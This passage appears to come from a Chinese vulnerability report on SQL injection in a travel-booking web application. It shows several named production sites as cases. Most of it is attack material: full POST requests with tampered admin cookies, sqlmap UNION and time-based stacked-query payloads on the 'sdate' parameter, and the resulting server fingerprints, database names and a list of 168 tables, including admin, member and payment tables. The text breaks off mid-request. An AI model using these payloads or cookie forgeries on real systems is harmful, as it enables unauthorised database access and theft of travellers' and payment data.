JdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABV9Db3B5cmlnaHQgJmNvcHk7IDIwMTQgaGhjbC5oLWguY29tLmNuIGFsbCByaWdodHMgcmVzZXJ2ZWQuIOWMl+S6rOa1t+WNjuiIquepuuacjeWKoeaciemZkOWFrOWPuGRkAgMPDxYCHwAFMeWcsOWdgO+8muWMl+S6rOW4guS4nOWfjuWMuuWuieW+t+i3r+eUsjEw5Y+3NS0xMDVkZAIFDw8WAh8ABSvnlLXor53vvJowMTAtNTE2NjIzNTUg5Lyg55yf77yaMDEwLTUxNjY4NDUwZGRk4UujVOiCDJV2KQ5W5yFZ6G/3beyhOf/bYa5kUT9h2TE=&__EVENTVALIDATION=/wEWCgK9/auVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN+p6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15') UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(119)+CHAR(85)+CHAR(81)+CHAR(114)+CHAR(88)+CHAR(69)+CHAR(65)+CHAR(66)+CHAR(71)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: haihua_pek
[168 tables]
+---------------------+
| Airways |
| Bank |
| CW_out |
| D99_REG |
| D99_Tmp |
| Hotel_City |
| Hotel_LandMarks |
| Hotel_OrderInfo |
| Hotel_PageSumInfo |
| Hotel_SingleAvail |
| Hotel_StaticInfos |
| Invoice |
| MybunkMessage |
| Notebook |
| OtherParm |
| PayOut |
| Report_mb |
| Report_mb_member |
| Roles |
| Roles_flag |
| System_Warn |
| System_info |
| Tplanetype |
| Visor |
| Wage_tab |
| admin |
| air |
| air_cab_class |
| aircity |
| airpiao |
| b2b_users |
| bm_login |
| books |
| bx_base |
| bx_product |
| cardnumjl |
| cgimg |
| cjr_login |
| cjrcard |
| company_bm |
| company_center |
| company_clk |
| company_flag |
| company_logo |
| company_news |
| company_sms |
| contact_info |
| cw_gd |
| cwkou |
| dbbak_history |
| fax_send |
| fax_submit |
| ft_City |
| ft_Config |
| ft_TAPrice |
| gjqz |
| gjqz_f |
| gjticket |
| hccity |
| hcsheng |
| hcsite |
| hf_history |
| hide_flight |
| hotel |
| huoche |
| jbitem |
| jp_detail |
| jp_line |
| kefu |
| kefu_files |
| kefu_mail |
| kefubm |
| kq_history |
| kq_items |
| ldt_history |
| link |
| lv_items |
| lv_items_mb |
| lv_orders_mx |
| lv_sclass |
| member |
| member_sales |
| member_sales_his |
| member_table |
| member_yu |
| menu_b |
| menu_s |
| message_mb |
| money_mx |
| money_other |
| news_read |
| oa_item |
| oa_main |
| orders_design |
| otherclass |
| pay_money |
| pay_money_main |
| pay_money_other |
| payfs |
| piaobei |
| piaodian |
| piaodian_yu |
| plane_xinhao |
| pnr |
| pnr_history |
| pnrdetail |
| postMain |
| postRe |
| ptype_set |
| resms |
| room |
| salestable |
| sfk_submit |
| sfk_submit_mx |
| sfkmx_other_view |
| sfkmx_view |
| shop_bigclass |
| shop_order |
| shop_product |
| shop_smallclass |
| sms |
| sms_key |
| soupiaoren |
| sys_nav |
| system_tx |
| tourbig |
| tourclass |
| tourday |
| tourline |
| tourlist |
| tournews |
| tourorder |
| traininfo |
| travel_item |
| travel_money |
| travel_order |
| travel_order_detail |
| tuipiao |
| view_cw |
| view_hctuipiao |
| view_js |
| view_kefu |
| view_kq_history |
| view_ldhistory |
| view_member_yu |
| view_pay_mx_main |
| view_piaodian_yu |
| view_scgq |
| view_travel_order |
| view_tuipiao |
| viewbmpnr |
| viewcjr |
| viewgjticket |
| viewhc |
| viewother |
| viewpnr |
| wtOrderDetails |
| wtOrders |
| wtgroup |
| wttgclass |
| xcd_ps_main |
| yc_group |
| yjbooks |
| zc_class |
| zc_list |
| zclist |
| zy_class |
| zy_zclist |
+---------------------+


案例二:http://www.4008836868.com/
POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.4008836868.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.4008836868.com/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=4tsndy41ilydo2ck4gem5ewy; tktcookie=memberid=3274&truename=asdaskdj&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3515
__VIEWSTATE=%2FwEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUIYXNkYXNrZGpkZAIFDw8WAh8ABQw0MDAtODgzLTY4NjhkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS%2FoeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFpQ48bGk%2BPGEgaHJlZj0iIyI%2B57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS%2FoeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI%2Bwrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0hvdGVsLyI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5p%2Bl6K%2BiPC9hPjxpIGNsYXNzPSJpY28wNCI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI%2Bwrcg562%2B6K%2BBPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI%2Bwrcg5L%2Bd6ZmpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI%2Bwrcg5YW25a6DPC9hPjwvbGk%2BPC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E%2BPGkgY2xhc3M9ImljbzA3Ij48L2k%2BPHVsIGNsYXNzPSJzdWItbmF2Ij48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n%2BiuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI%2Bwrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk%2BPC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABTlDb3B5cmlnaHQgJmNvcHk7IDIwMTQgNDAwODgzNjg2OC5jb20gYWxsIHJpZ2h0cyByZXNlcnZlZC5kZAIDDw8WAh8ABUnlnLDlnYDvvJrkuIrmtbfluILplb%2FlroHljLrlu7blronopb%2Fot68zOTTlvIQ45Y%2B36IGU5oGS5ZWG5Lia5aSn5Y6mNjAz5a6kZGQCBQ8PFgIfAAUr55S16K%2Bd77yaNDAwLTg4My02ODY4IOS8oOecn%2B%2B8mjAyMS01MTY4NTIwNmRkZAZx33S%2BJIcoJtcT6y34LMTk1eNnPAY56WO7oiOInRDo&__EVENTVALIDATION=%2FwEWCgKg%2Fa2kAQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCXHNZ42f4qO60mvtrzDdYNphu0TTEXtyny8Gn6twQzgZ&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274


1.jpg


2.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUIYXNkYXNrZGpkZAIFDw8WAh8ABQw0MDAtODgzLTY4NjhkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFpQ48bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABTlDb3B5cmlnaHQgJmNvcHk7IDIwMTQgNDAwODgzNjg2OC5jb20gYWxsIHJpZ2h0cyByZXNlcnZlZC5kZAIDDw8WAh8ABUnlnLDlnYDvvJrkuIrmtbfluILplb/lroHljLrlu7blronopb/ot68zOTTlvIQ45Y+36IGU5oGS5ZWG5Lia5aSn5Y6mNjAz5a6kZGQCBQ8PFgIfAAUr55S16K+d77yaNDAwLTg4My02ODY4IOS8oOecn++8mjAyMS01MTY4NTIwNmRkZAZx33S+JIcoJtcT6y34LMTk1eNnPAY56WO7oiOInRDo&__EVENTVALIDATION=/wEWCgKg/a2kAQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCXHNZ42f4qO60mvtrzDdYNphu0TTEXtyny8Gn6twQzgZ&sdate=2015-6-15');WAITFOR DELAY '0:0:10'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUIYXNkYXNrZGpkZAIFDw8WAh8ABQw0MDAtODgzLTY4NjhkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFpQ48bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABTlDb3B5cmlnaHQgJmNvcHk7IDIwMTQgNDAwODgzNjg2OC5jb20gYWxsIHJpZ2h0cyByZXNlcnZlZC5kZAIDDw8WAh8ABUnlnLDlnYDvvJrkuIrmtbfluILplb/lroHljLrlu7blronopb/ot68zOTTlvIQ45Y+36IGU5oGS5ZWG5Lia5aSn5Y6mNjAz5a6kZGQCBQ8PFgIfAAUr55S16K+d77yaNDAwLTg4My02ODY4IOS8oOecn++8mjAyMS01MTY4NTIwNmRkZAZx33S+JIcoJtcT6y34LMTk1eNnPAY56WO7oiOInRDo&__EVENTVALIDATION=/wEWCgKg/a2kAQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCXHNZ42f4qO60mvtrzDdYNphu0TTEXtyny8Gn6twQzgZ&sdate=2015-6-15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(108)+CHAR(78)+CHAR(114)+CHAR(73)+CHAR(78)+CHAR(104)+CHAR(114)+CHAR(118)+CHAR(114)+CHAR(75)+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'PiaoYou_james'


案例三:http://travel.piaoyou.org


POST //Financial/fksq_meb.aspx HTTP/1.1
Host: travel.piaoyou.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://travel.piaoyou.org//Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=gahoq4vgqy1up25s1exqex2m; tktcookie=memberid=36&truename=alksdlk&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3893
__VIEWSTATE=%2FwEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFB2Fsa3NkbGtkZAIFDw8WAh8ABQwwMjEtNjc4MDAyMjdkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS%2FoeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFoA88bGk%2BPGEgaHJlZj0iIyI%2B57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMyI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS%2FoeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI%2Bwrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0hvdGVsLyI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5p%2Bl6K%2BiPC9hPjxpIGNsYXNzPSJpY28wNCI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh%2BiIseaUueacn%2BiusOW9lTwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPj